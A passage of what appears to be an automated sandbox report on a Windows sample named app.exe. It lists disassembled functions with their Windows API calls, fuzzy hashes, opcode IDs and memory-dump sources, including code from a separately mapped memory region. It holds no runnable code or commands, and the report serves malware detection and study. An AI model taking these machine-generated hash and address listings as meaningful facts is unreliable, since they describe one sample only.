                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3354205298-0
                                                                                                                                              • Opcode ID: b96f505ea3630a247bd448bdacb66984f0b113bced7556e7e02f6fbeb0dcfbd3
                                                                                                                                              • Instruction ID: 4fe3f08868a5226f7d3e4c173db8bd2c93613d59b8a0c76e427b94b244e74582
                                                                                                                                              • Opcode Fuzzy Hash: b96f505ea3630a247bd448bdacb66984f0b113bced7556e7e02f6fbeb0dcfbd3
                                                                                                                                              • Instruction Fuzzy Hash: 49010C71A0011AEBCF11DFA4DC48E9BB7BDFF09314F808472FA15D6110D275A51A8B64
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • FindResourceA.KERNEL32(?,?,000000F0), ref: 00426360
                                                                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,?,?,00422CD3,?,?,00401A10,?,?,?,?,?,0042DD38), ref: 0042636C
                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,?,?,00422CD3,?,?,00401A10,?,?,?,?,?,0042DD38,000000FF), ref: 00426379
                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,00422CD3,?,?,00401A10,?,?,?,?,?,0042DD38,000000FF), ref: 00426394
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$FindFreeLoadLock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1078018258-0
                                                                                                                                              • Opcode ID: 4c303f29aad7c5551cea9d80b4e0defa102d9efb6e724846d62db9275e0aa396
                                                                                                                                              • Instruction ID: 76cf06ceb5d42f02d60e4406da92eb06dd1ed344124334fc899015a258015dc8
                                                                                                                                              • Opcode Fuzzy Hash: 4c303f29aad7c5551cea9d80b4e0defa102d9efb6e724846d62db9275e0aa396
                                                                                                                                              • Instruction Fuzzy Hash: 40F0F63A3012229B83205FA66C4497BB7ACEFC67627C6007AFD08C2211DF258C06857C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • EnableMenuItem.USER32(?,?,?), ref: 004226D9
                                                                                                                                              • GetFocus.USER32 ref: 004226EC
                                                                                                                                              • GetParent.USER32(?), ref: 004226FA
                                                                                                                                              • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 0042270F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnableFocusItemMenuMessageParentSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2297321873-0
                                                                                                                                              • Opcode ID: d719d4f1826348346d23ac329250c9ff44aabbd6e9454e1dd4734ed6490b57f8
                                                                                                                                              • Instruction ID: 617dea23d70acb73f8f92018a64976e9019581151da9ed12eae54fe0019a468e
                                                                                                                                              • Opcode Fuzzy Hash: d719d4f1826348346d23ac329250c9ff44aabbd6e9454e1dd4734ed6490b57f8
                                                                                                                                              • Instruction Fuzzy Hash: 0E015E31204610ABDB389F10ED49F56BBB0EF90755F90863EF142921E0CBB4A895CA48
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00428CCA
                                                                                                                                              • GetWindowTextA.USER32(?,?,00000100), ref: 00428CE6
                                                                                                                                              • lstrcmpA.KERNEL32(?,?), ref: 00428CFA
                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00428D0A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: TextWindow$lstrcmplstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 330964273-0
                                                                                                                                              • Opcode ID: e7043af6485233e72652ee463e779a3a2077c7ee8e68495221b17dea8af2fa28
                                                                                                                                              • Instruction ID: ab625cd30283d468c6a5a3a0154dbe0d4626f66796105f6a39e5641a5fe47872
                                                                                                                                              • Opcode Fuzzy Hash: e7043af6485233e72652ee463e779a3a2077c7ee8e68495221b17dea8af2fa28
                                                                                                                                              • Instruction Fuzzy Hash: 35F06D75600018EBCF21AF60ED449CE7BB9EF18358F808072F909D62A0DB74DE59DB48
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0042C118
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0042C125
                                                                                                                                              • CoFreeUnusedLibraries.OLE32 ref: 0042C134
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0042C13A
                                                                                                                                                • Part of subcall function 0042C09F: CoFreeUnusedLibraries.OLE32(00000000,0042C17F,00000000,?,?,004119DD), ref: 0042C0E3
                                                                                                                                                • Part of subcall function 0042C09F: OleUninitialize.OLE32(?,?,004119DD), ref: 0042C0E9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 685759847-0
                                                                                                                                              • Opcode ID: b5874d32bad5070bf434eb1db7257aa41fe591bf19fa899e05926cb079051f1c
                                                                                                                                              • Instruction ID: fa01731afa84a5c76d3ef70e4e48df64ef66ba0b78331b06acedfa9e6f689827
                                                                                                                                              • Opcode Fuzzy Hash: b5874d32bad5070bf434eb1db7257aa41fe591bf19fa899e05926cb079051f1c
                                                                                                                                              • Instruction Fuzzy Hash: C9E0E534A04224DAE724AF74FC8932D7AA4EB56311FD1883BD041A2162C73858D5CE9E
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DecrementInterlockedlstrlen
                                                                                                                                              • String ID: (1D
                                                                                                                                              • API String ID: 3894653158-2129874033
                                                                                                                                              • Opcode ID: bd28ca77c038792ffbe5868c204803e66c6c098a52fe2d6f0d143d211d85f30c
                                                                                                                                              • Instruction ID: 858d2aefe05a656e08fe5f4863ded23aa7559c905939fa8f8aa05e635d827225
                                                                                                                                              • Opcode Fuzzy Hash: bd28ca77c038792ffbe5868c204803e66c6c098a52fe2d6f0d143d211d85f30c
                                                                                                                                              • Instruction Fuzzy Hash: AEB14871C00119AEDB01EBE5CD86EEEBBB8AF19304F50416EF501B31D2DB785A09DBA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClearVariant
                                                                                                                                              • String ID: @$@
                                                                                                                                              • API String ID: 1473721057-149943524
                                                                                                                                              • Opcode ID: 54e3d7c58431ed1a8a2faafa339e1a674b98199fcfceda2c24aa9145b0b1d073
                                                                                                                                              • Instruction ID: 7d4217390c867d17d4dff42acfee68232351a7b4ec1a73aaeb500dadfbc22095
                                                                                                                                              • Opcode Fuzzy Hash: 54e3d7c58431ed1a8a2faafa339e1a674b98199fcfceda2c24aa9145b0b1d073
                                                                                                                                              • Instruction Fuzzy Hash: 8C51A6B1A002199FDB04CF99C8849EEBBF5FF48314F14456EE506E7251E774A945CF60
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Info
                                                                                                                                              • String ID: $
                                                                                                                                              • API String ID: 1807457897-3032137957
                                                                                                                                              • Opcode ID: ea25d807aac96f0c9d0dd241a4ad9b12794653fbfb175f80958580c13e1a6fab
                                                                                                                                              • Instruction ID: 25a5130d2be980f96d16b4b058943b934398b817a05338b1aaa33722a9e7f48b
                                                                                                                                              • Opcode Fuzzy Hash: ea25d807aac96f0c9d0dd241a4ad9b12794653fbfb175f80958580c13e1a6fab
                                                                                                                                              • Instruction Fuzzy Hash: FD41563110929C9FEB519B28DC99BFB3BF8EF06304F2808E2D545CB192D72849C59BD8
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000104), ref: 004038F6
                                                                                                                                                • Part of subcall function 00401FE9: lstrlenA.KERNEL32(?,?,?,?,00402E72,?), ref: 00402008
                                                                                                                                              • CharLowerA.USER32(?,?,00000004,?), ref: 00403924
                                                                                                                                                • Part of subcall function 00402C6D: MessageBoxA.USER32(00000000,?,00000000,00000030), ref: 00402D19
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharFileLowerMessageModuleNamelstrlen
                                                                                                                                              • String ID: .dll
                                                                                                                                              • API String ID: 1366549216-2738580789
                                                                                                                                              • Opcode ID: ed755644410f0a6ee9be1c8b2e18ebcf4b444024a13bcd5a83e04fb954c330c4
                                                                                                                                              • Instruction ID: e925d1146906c940dbfae2266fa14a7952d3259283bc435cb66516965c737666
                                                                                                                                              • Opcode Fuzzy Hash: ed755644410f0a6ee9be1c8b2e18ebcf4b444024a13bcd5a83e04fb954c330c4
                                                                                                                                              • Instruction Fuzzy Hash: 50319372A041195BDB15BBA19D42EEF375C6F00709F60013BF911B21E2DE7C9A05869D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000104,?), ref: 00403FF6
                                                                                                                                                • Part of subcall function 00401FE9: lstrlenA.KERNEL32(?,?,?,?,00402E72,?), ref: 00402008
                                                                                                                                              • CharLowerA.USER32(?,?,00000004,?), ref: 0040402F
                                                                                                                                                • Part of subcall function 00402C6D: MessageBoxA.USER32(00000000,?,00000000,00000030), ref: 00402D19
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharFileLowerMessageModuleNamelstrlen
                                                                                                                                              • String ID: .dll
                                                                                                                                              • API String ID: 1366549216-2738580789
                                                                                                                                              • Opcode ID: 7ee78063d823e0c6d8b8f1480ed479fa6a1540bc085ae308c9012322817352e7
                                                                                                                                              • Instruction ID: e6b5aef0d27c6589e7d05cc20d88ea959a984bc3c2dd37e4e74a46bfd1a24eba
                                                                                                                                              • Opcode Fuzzy Hash: 7ee78063d823e0c6d8b8f1480ed479fa6a1540bc085ae308c9012322817352e7
                                                                                                                                              • Instruction Fuzzy Hash: DC31A2B1900109ABDB11EBE1D942AEEB778EF15319F10403FF215F21D1EB784A08CB69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000104,?), ref: 00403A31
                                                                                                                                                • Part of subcall function 00401FE9: lstrlenA.KERNEL32(?,?,?,?,00402E72,?), ref: 00402008
                                                                                                                                              • CharLowerA.USER32(?,?,00000004,?), ref: 00403A67
                                                                                                                                                • Part of subcall function 00402C6D: MessageBoxA.USER32(00000000,?,00000000,00000030), ref: 00402D19
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharFileLowerMessageModuleNamelstrlen
                                                                                                                                              • String ID: .dll
                                                                                                                                              • API String ID: 1366549216-2738580789
                                                                                                                                              • Opcode ID: bb160a83ece6b52ad72d685bd7d2f3ba3769fc739be267bbfaec33bc36789f92
                                                                                                                                              • Instruction ID: 1cad220353df42b9fe3cb840776f885c9a0654f48a55dcbb27447a2c56b74ffd
                                                                                                                                              • Opcode Fuzzy Hash: bb160a83ece6b52ad72d685bd7d2f3ba3769fc739be267bbfaec33bc36789f92
                                                                                                                                              • Instruction Fuzzy Hash: 7A219231A00119AADB15FBA1DD47BEEBB68AF11709F10013BF501B10E2DBB95B058AA9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\app.exe,00000104,76170A60,00000000,?,?,?,?,00415EFD,?,0043A478,00000060), ref: 0041AD32
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileModuleName
                                                                                                                                              • String ID: C:\Users\user\Desktop\app.exe$`&U
                                                                                                                                              • API String ID: 514040917-459890222
                                                                                                                                              • Opcode ID: 66673b88aeac30b5862c7f19f0dfac2f7032082bc53584202ad8921e1cff1ff6
                                                                                                                                              • Instruction ID: 614c3b4fec6d9241ade8c6b785d03dc512eb996b59ee3b151466fb442cd8355e
                                                                                                                                              • Opcode Fuzzy Hash: 66673b88aeac30b5862c7f19f0dfac2f7032082bc53584202ad8921e1cff1ff6
                                                                                                                                              • Instruction Fuzzy Hash: 7711E3B6A05204AFDB11CBA5AC819DB3BB8EB56361B10017BF905D3241DB74AD84CB99
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • FormatMessageA.KERNEL32(00001100,00000000,00000000), ref: 0040B4ED
                                                                                                                                              • LocalFree.KERNEL32(?), ref: 0040B509
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FormatFreeLocalMessage
                                                                                                                                              • String ID: %s: %s
                                                                                                                                              • API String ID: 1427518018-482213395
                                                                                                                                              • Opcode ID: cb34f2c211801dad6e02dc7f0dafd164b821e9fb1e5606d2b24e1b197d6c7187
                                                                                                                                              • Instruction ID: 35399d86799f3bd421e0b29904ac2acc2a0d57492efff96d11af9728831ada6b
                                                                                                                                              • Opcode Fuzzy Hash: cb34f2c211801dad6e02dc7f0dafd164b821e9fb1e5606d2b24e1b197d6c7187
                                                                                                                                              • Instruction Fuzzy Hash: A1E04F75680208FBEB115BC0ED07FDE7B38EB09745F600070FB00A80E1D6B26A14AB6D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CommandLine
                                                                                                                                              • String ID: `&U
                                                                                                                                              • API String ID: 3253501508-1867068525
                                                                                                                                              • Opcode ID: 4c608e21066b1068bf4b00fd84b95a229c866aa5cf7fac5f33b6db2afda0b2ee
                                                                                                                                              • Instruction ID: 9b6fa4ce475a429c964bbaf9ce9b9551184bf7d98fd8d02fc75588487da086c5
                                                                                                                                              • Opcode Fuzzy Hash: 4c608e21066b1068bf4b00fd84b95a229c866aa5cf7fac5f33b6db2afda0b2ee
                                                                                                                                              • Instruction Fuzzy Hash: 25B048B8C84784CB87918F71A008A083AA5B2692027816D96DA2AD2605EB350069EF18
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025CA710: CloseHandle.KERNEL32(?), ref: 025CA7A6
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 025CA5D0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025CA5E1
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 025CA615
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025CA626
                                                                                                                                                • Part of subcall function 025CA710: FindFirstFileW.KERNEL32(?,?), ref: 025CA8CD
                                                                                                                                                • Part of subcall function 025CA710: FindClose.KERNEL32(00000000), ref: 025CA8E0
                                                                                                                                                • Part of subcall function 025CA710: HeapFree.KERNEL32(00000000,?), ref: 025CA9F0
                                                                                                                                                • Part of subcall function 025CA710: HeapFree.KERNEL32(00000000,?), ref: 025CAA01
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseFind$FileFirstHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1603849924-0
                                                                                                                                              • Opcode ID: 7fd60108e3c947f17cccde0a06f2134368e38086809399791bed0c3c0b48279c
                                                                                                                                              • Instruction ID: 712f54dca6fc1064811da65585a35cc72d91f4df87e7249ebb2d101455728b9f
                                                                                                                                              • Opcode Fuzzy Hash: 7fd60108e3c947f17cccde0a06f2134368e38086809399791bed0c3c0b48279c
                                                                                                                                              • Instruction Fuzzy Hash: 68711675904B44CFE721CF68C944B52BBF0FF18318F109A5DE99A8BA62E731B984CB44
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0258224A: HeapFree.KERNEL32(00000000,?), ref: 025822AD
                                                                                                                                                • Part of subcall function 0258224A: HeapFree.KERNEL32(00000000,?), ref: 025822C7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: fafc8545d1e0ee592f43380223a977fae7ae16cc07f112644848093fc61ddf42
                                                                                                                                              • Instruction ID: 5cbc37786f8a37ec56f265d1c9d63e297cae17ed2af14f5f98659738aa527a5d
                                                                                                                                              • Opcode Fuzzy Hash: fafc8545d1e0ee592f43380223a977fae7ae16cc07f112644848093fc61ddf42
                                                                                                                                              • Instruction Fuzzy Hash: 04311C30545B81DEEB7AEB34D818BE7BFE17B12308F04081CD5EB955A0CBB42589CB0A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025857F5
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 025858DF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02585969
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860B5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860D2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 02586105
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258632F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: 5693f169862e010611fd35ac66bcdcc814052ad508fc8a7f05ccf7671d51d12d
                                                                                                                                              • Instruction ID: 39a31294717058e13e0efd6edbbdf08f3aa36bbba553cba248ddbd69a504ffde
                                                                                                                                              • Opcode Fuzzy Hash: 5693f169862e010611fd35ac66bcdcc814052ad508fc8a7f05ccf7671d51d12d
                                                                                                                                              • Instruction Fuzzy Hash: 2F21E531544201DFDF25EF10D8887E97BA6BF80315F044479DD489F296CBB15895CF9A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: 67268eaf495987e7ba767f0d0d0c0cbf8d97906f45aabd789f454e4b0b6f89e0
                                                                                                                                              • Instruction ID: fa192ef5c2b6e3388e7718a01416c6f6ddf5ac4b5795bf58c28442a66f451eba
                                                                                                                                              • Opcode Fuzzy Hash: 67268eaf495987e7ba767f0d0d0c0cbf8d97906f45aabd789f454e4b0b6f89e0
                                                                                                                                              • Instruction Fuzzy Hash: 62310C30145B80DEEB7AEB34D818BE7BFE17B52309F04081DD5EB955A1CBB42589DB0A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0257C781: HeapFree.KERNEL32(00000000,?), ref: 0257D2DD
                                                                                                                                                • Part of subcall function 0257C781: HeapFree.KERNEL32(00000000,?), ref: 0257D32E
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: 9afb99f09c3f509f416d90dd15c3e6c2419dcd20711dc49ee022c4f6f9e5f32e
                                                                                                                                              • Instruction ID: 9186f917e0a980fb2710ee90d8c40cdbd956869edebc4a1216b1b03fd2c90749
                                                                                                                                              • Opcode Fuzzy Hash: 9afb99f09c3f509f416d90dd15c3e6c2419dcd20711dc49ee022c4f6f9e5f32e
                                                                                                                                              • Instruction Fuzzy Hash: AF310E30145B80DEEB79EB34D818BE7BFE17B52309F04081DD5EB955A1CBB42589DB0A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 02582324: HeapFree.KERNEL32(00000000,?), ref: 0258234F
                                                                                                                                                • Part of subcall function 02582324: HeapFree.KERNEL32(00000000,?), ref: 0258236C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: 438876fa6ef73cd743ee840f140a2b0e1e1e994d70930dabff6ca560a267e90b
                                                                                                                                              • Instruction ID: 55b76915917ac253f6071291f5f76a3257b0c684061ea12f845bf6376da65f98
                                                                                                                                              • Opcode Fuzzy Hash: 438876fa6ef73cd743ee840f140a2b0e1e1e994d70930dabff6ca560a267e90b
                                                                                                                                              • Instruction Fuzzy Hash: 1A310D30145B80DEEB7AEB34D818BE7BFE17B52309F04081CD5EB955A1CBB42589DB0A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,025D0912), ref: 025D66D4
                                                                                                                                                • Part of subcall function 025D6BAA: HeapFree.KERNEL32(00000000,00000000,?,026133EC,025D7C1C,00000000,00000000,?,?,02611EE8,025D5C76), ref: 025D6BB8
                                                                                                                                                • Part of subcall function 025D6BAA: HeapFree.KERNEL32(00000000,?,?,026133EC,025D7C1C,00000000,00000000,?,?,02611EE8), ref: 025D6BD2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,025D0912), ref: 025D66F1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,025D0912), ref: 025D670E
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,025D0912), ref: 025D675C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
